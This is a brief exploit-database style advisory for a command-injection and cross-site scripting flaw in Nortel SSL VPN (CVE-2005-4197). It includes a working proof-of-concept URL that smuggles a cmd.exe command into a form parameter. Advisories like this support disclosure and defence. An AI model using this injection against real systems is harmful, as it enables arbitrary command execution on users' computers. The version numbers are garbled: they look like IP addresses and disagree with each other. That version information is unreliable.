source: http://www.securityfocus.com/bid/15798/info Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible. Nortel SSL VPN 126.96.36.199 is vulnerable to this issue; other versions may also be affected. https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...
Related ExploitsTrying to match CVEs (1): CVE-2005-4197
Trying to match OSVDBs (1): 21615
Other Possible E-DB Search Terms: Nortel SSL VPN 188.8.131.52, Nortel SSL VPN
|2007-02-21||Nortel SSL VPN Linux Client 6.0.3 - Local Privilege Escalation||Jon Hart|